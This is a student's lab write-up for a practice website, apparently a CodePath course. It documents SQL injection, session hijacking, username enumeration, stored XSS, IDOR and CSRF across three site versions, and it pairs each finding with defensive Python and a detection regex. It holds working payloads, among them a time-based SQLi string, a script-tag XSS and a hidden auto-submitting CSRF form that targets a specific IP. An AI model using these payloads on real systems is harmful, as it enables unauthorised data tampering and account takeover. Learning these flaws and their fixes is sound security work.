Time spent: 5 hours in total
Objective: Identify vulnerabilities in three different versions of the Globitek website: blue, green, and red.
The six possible exploits are:
- Username Enumeration
- Insecure Direct Object Reference (IDOR)
- SQL Injection (SQLi)
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)
- Session Hijacking/Fixation
Each version of the site has been given two of the six vulnerabilities. (In other words, all six of the exploits should be assignable to one of the sites.)
Vulnerability #1: SQL Injection (SQLi)
- The attacker injects a SQL command in place of the expected salesperson ID number.
- Injected SQL Command:
%27%20OR%20SLEEP(5)=0--%27
- This causes the database to wait 5 seconds while executing the query, which shows that the injected SQL is being run.
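As an added illustration (not code from the Globitek site, which is PHP), the Python below shows the two sides of this finding: the string-spliced query that makes the payload above work, the hardened lookup that validates the id and binds it as a parameter, and a small log check that URL-decodes a query string and flags time-based payloads. The salespeople table and its schema are constructed here and are an assumption.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for the Globitek salespeople table (schema assumed; the page does not show it).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE salespeople (id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO salespeople VALUES (?, ?, ?)",
                     [(1, "Daron", "Burke"), (5, "Ken", "Barker")])
    return conn

def build_query_vulnerable(raw_id):
    # The injectable pattern: the request parameter is spliced into the SQL text, so a
    # closing quote in the input ends the literal and the rest is parsed as SQL.
    return f"SELECT id, first_name, last_name FROM salespeople WHERE id = '{raw_id}'"

ID_PATTERN = re.compile(r"[0-9]{1,9}")

def find_salesperson(conn, raw_id):
    # Hardened lookup: the id must be a short decimal integer, and the value is bound as a
    # parameter, so the database never parses attacker-controlled text as SQL.
    if not ID_PATTERN.fullmatch(raw_id):
        return None
    return conn.execute(
        "SELECT id, first_name, last_name FROM salespeople WHERE id = ?",
        (int(raw_id),),
    ).fetchone()

# Detection side: time-based payloads name a delay function and break out of a string literal.
DELAY_FUNCTIONS = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\b", re.IGNORECASE)

def flag_time_based_sqli(query_string):
    # Decode before matching: the payload on the page arrives URL-encoded (%27 is the quote).
    decoded = unquote(query_string)
    return bool(DELAY_FUNCTIONS.search(decoded) and ("'" in decoded or "--" in decoded))

if __name__ == "__main__":
    payload = unquote("%27%20OR%20SLEEP(5)=0--%27")
    print(build_query_vulnerable(payload))
    print(find_salesperson(make_db(), "5"), find_salesperson(make_db(), payload))
    print(flag_time_based_sqli("id=%27%20OR%20SLEEP(5)=0--%27"), flag_time_based_sqli("id=5"))
```

The validation step alone would stop this particular payload, but the parameter binding is the control that holds when the input is legitimately free text; the log check is only a first-pass filter and should be tuned on real traffic.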
Vulnerability #2: Session Hijacking/Fixation
- The victim's session ID is obtained through the tool provided by CodePath.
- Using Burp, we intercept the attacker's request to a secured page.
- In the intercepted request, we replace the session ID with the one obtained from the victim.
- Once the request is forwarded, the attacker is logged in under the victim's session.
Vulnerability #1: Username Enumeration
- As shown above, the green website has a username enumeration flaw: the failed-login message differs depending on whether the username exists.
- Using Chrome's developer tools, I was able to see that the developer assigns two different classes, failed and failure, to the error message depending on the login scenario.
- The "failure" class is given a bold style in the CSS while the "failed" class is not, so the two cases render differently. (Screenshots below)
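The login handler below is an added example (not Globitek's code) covering both the session hijacking/fixation finding and the username enumeration finding: every failed login returns one message with one CSS class and does the same hashing work whether or not the username exists, and a successful login discards the session ID the browser presented and issues a fresh one, so an ID captured or planted beforehand never becomes an authenticated session. The user table, the PBKDF2 storage and the cookie name are assumptions made for the example.

```python
import hashlib
import hmac
import os
import secrets

def _hash(password, salt):
    # PBKDF2 is an assumption for this example; the page does not describe how Globitek stores passwords.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)

# Constructed user table: username -> (salt, password hash).
_SALT = os.urandom(16)
USERS = {"kbarker": (_SALT, _hash("correct horse battery", _SALT))}
# Dummy credential so an unknown username costs the same hashing work as a known one
# (otherwise the response time leaks whether the account exists).
_DUMMY = (_SALT, _hash("placeholder-not-a-real-password", _SALT))

# One message and one CSS class for every failure: on the green site the "failed" vs "failure"
# classes made the two cases distinguishable even where the text looked the same.
FAILURE_HTML = '<p class="failed">Login failed. Check your username and password.</p>'

class SessionStore:
    def __init__(self):
        self.sessions = {}  # session id -> username, or None while unauthenticated

    def start(self):
        sid = secrets.token_urlsafe(32)  # 256 bits of randomness, so ids cannot be guessed
        self.sessions[sid] = None
        return sid

    def login(self, presented_sid, username, password):
        salt, stored = USERS.get(username, _DUMMY)
        password_ok = hmac.compare_digest(_hash(password, salt), stored)
        if not (password_ok and username in USERS):
            return FAILURE_HTML, presented_sid
        # Fixation/hijack defence: drop whatever id the browser presented and issue a new one,
        # so an id captured or planted before authentication is never tied to the logged-in user.
        self.sessions.pop(presented_sid, None)
        new_sid = self.start()
        self.sessions[new_sid] = username
        return f"Welcome, {username}", new_sid

    def user_for(self, sid):
        return self.sessions.get(sid)

def session_cookie(sid):
    # Secure keeps the id off plain HTTP, HttpOnly keeps it away from page scripts,
    # SameSite=Lax keeps it out of most cross-site requests.
    return f"Set-Cookie: session={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"
```

Rotating the ID on login does not by itself stop an attacker who captures the ID after login; that is what the cookie attributes and a short idle timeout are for.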
Vulnerability #2: Cross-Site Scripting (XSS)
- The attacker can inject a script into the feedback form.
- Injected XSS payload:
<script>alert('Jinwoo found the XSS!');</script>
- The script executes when the account holder views their feedback page, since the stored feedback is rendered into the page as-is.
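Added example (not the site's code): the unsafe render that puts stored feedback straight into the page next to the fixed version that HTML-encodes each value at output time. The feedback entries are constructed; the second one is the payload from above.

```python
import html

# Constructed feedback entries as they would sit in the database; the second is the page's payload.
FEEDBACK = [
    ("alice", "Great service, thanks!"),
    ("mallory", "<script>alert('Jinwoo found the XSS!');</script>"),
]

def render_feedback_vulnerable(entries):
    # Stored input dropped straight into the markup: the browser parses the script tag and runs it.
    return "<ul>\n" + "\n".join(f"<li><b>{a}</b>: {m}</li>" for a, m in entries) + "\n</ul>"

def render_feedback(entries):
    # Encode at output time for the context the value lands in (HTML text here).
    # html.escape also encodes quotes, which matters if a value is ever placed inside an attribute.
    return "<ul>\n" + "\n".join(
        f"<li><b>{html.escape(a)}</b>: {html.escape(m)}</li>" for a, m in entries
    ) + "\n</ul>"

def contains_raw_script(markup):
    # Quick check a reviewer or a test can run over rendered output.
    return "<script" in markup.lower()

if __name__ == "__main__":
    print(render_feedback_vulnerable(FEEDBACK))
    print(render_feedback(FEEDBACK))
```

Encoding on output is the fix; filtering on input is not a substitute, because the same stored value may be rendered in several contexts. A Content-Security-Policy header that disallows inline scripts limits the damage if an encoding step is missed.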
Vulnerability #1: Insecure Direct Object Reference
- The GIF above shows an attacker accessing hidden user accounts that the attacker is not permitted to view.
- This is done by modifying the "id" parameter in the URL of the GET request.
- Below are the accounts that the attacker is able to access:
- ID: 1 NAME: Daron Burke
- ID: 2 NAME: Sherry Trevino
- ID: 3 NAME: Irene Boliing
- ID: 4 NAME: Robert Hamilton
- ID: 5 NAME: Ken Barker
- ID: 6 NAME: Elizabeth Olson
- ID: 7 NAME: Samuel Hunter
- ID: 8 NAME: Kim Stanley
- ID: 9 NAME: Barbara Hinckley
- ID: 10 NAME: Testy McTesterson (illegal access)
- ID: 11 NAME: Lazy Lazyman (illegal access)
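Added example (not Globitek's code) of the server-side check the red site is missing: the record is looked up by the id in the URL, but whether it is returned is decided from the logged-in user, and a denied lookup gets the same 404 as a missing one so ids cannot be confirmed by probing. The records use ids and names from the list above; the owner field and the admin flag are assumptions about how a login is tied to a record.

```python
from urllib.parse import parse_qs

# Constructed records: ids and names from the page, with an assumed "owner" login per record.
SALESPEOPLE = {
    1: {"name": "Daron Burke", "owner": "dburke"},
    5: {"name": "Ken Barker", "owner": "kbarker"},
    10: {"name": "Testy McTesterson", "owner": "tester"},
}

DENIED = []  # audit trail of refused lookups; a logged-in user probing other ids is worth alerting on

def authorize(current_user, requested_id, is_admin=False):
    # The decision uses the session's user, never anything the client sends in the URL.
    record = SALESPEOPLE.get(requested_id)
    if record is None:
        return "missing", None
    if is_admin or record["owner"] == current_user:
        return "ok", record
    return "denied", None

def handle_show(current_user, query_string, is_admin=False):
    # Validate the id from the query string; anything non-numeric is a plain 404.
    raw = parse_qs(query_string).get("id", [""])[0]
    if not (raw.isascii() and raw.isdigit()):
        return 404, None
    outcome, record = authorize(current_user, int(raw), is_admin)
    if outcome == "denied":
        DENIED.append((current_user, int(raw)))
    if outcome != "ok":
        return 404, None  # same status for missing and denied
    return 200, record

if __name__ == "__main__":
    print(handle_show("kbarker", "id=5"))
    print(handle_show("kbarker", "id=10"), DENIED)
```

Using unguessable identifiers instead of sequential ids makes probing harder but is not a fix on its own; the ownership check is the control.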
Vulnerability #2: Cross-Site Request Forgery (CSRF)
- Created a malicious page that uses the logged-in user's session to forge a request that modifies the database:
<html>
<head>
<title>NOT A FAKE FORM</title>
</head>
<body onload="document.my_form.submit()">
<form action="https://35.184.199.7/red/public/staff/salespeople/edit.php?id=5" method="POST" name="my_form" style="display: none;" target="hidden_results" >
<input type="text" name="first_name" value="TROLLEDDDD" />
<input type="text" name="last_name" value="SORRY_Mr.Barker" />
<input type="text" name="phone" value="777-777-7777" />
<input type="text" name="email" value="TROLLED@TORLLED.COM" />
</form>
<iframe name="hidden_results" style="display: none;"></iframe>
</body>
</html>
- This page silently submits a POST request on load and hides the response in a hidden iframe.
- As a result, a salesperson record in the database is altered.
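Added example (not the site's code) of how edit.php could reject the forged form above: a synchronizer token is issued per session and rendered into the real edit form as a hidden field, and a POST is only applied when the Origin header matches the site and the submitted token matches the session's token in a constant-time compare. The site origin is taken from the form's action URL; the session id and the attacker origin in the test are constructed.

```python
import hmac
import secrets
from html import escape

class CsrfGuard:
    """Synchronizer-token pattern: one secret per session, required on every state-changing form."""

    def __init__(self):
        self.tokens = {}  # session id -> token

    def token_for(self, session_id):
        return self.tokens.setdefault(session_id, secrets.token_urlsafe(32))

    def hidden_field(self, session_id):
        # Goes inside the genuine edit form; a page on another origin cannot read it.
        return f'<input type="hidden" name="csrf_token" value="{escape(self.token_for(session_id))}">'

    def verify(self, session_id, form, origin, site_origin):
        # 1. Browsers send Origin on cross-site POSTs; anything that is not our site is refused.
        if origin is not None and origin != site_origin:
            return False
        # 2. The form must carry the token issued to this session (the forged page has none).
        expected = self.tokens.get(session_id)
        submitted = form.get("csrf_token")
        if expected is None or submitted is None:
            return False
        return hmac.compare_digest(expected, submitted)

def edit_salesperson(guard, session_id, form, origin, site_origin="https://35.184.199.7"):
    # Stand-in for the POST handler of edit.php: check first, then apply the change.
    if not guard.verify(session_id, form, origin, site_origin):
        return 403, "rejected"
    return 200, "updated"

if __name__ == "__main__":
    guard = CsrfGuard()
    forged = {"first_name": "TROLLEDDDD", "last_name": "SORRY_Mr.Barker",
              "phone": "777-777-7777", "email": "TROLLED@TORLLED.COM"}
    print(edit_salesperson(guard, "victim-session", forged, "https://attacker.example"))
    print(edit_salesperson(guard, "victim-session",
                           dict(forged, csrf_token=guard.token_for("victim-session")),
                           "https://35.184.199.7"))
```

Setting SameSite=Lax on the session cookie adds a second layer, since the browser then withholds the cookie from the forged page's POST, but the token check is the control that does not depend on browser behaviour.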
GIF created with LiceCap.
Copyright [2017] [Jinwoo Yom]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.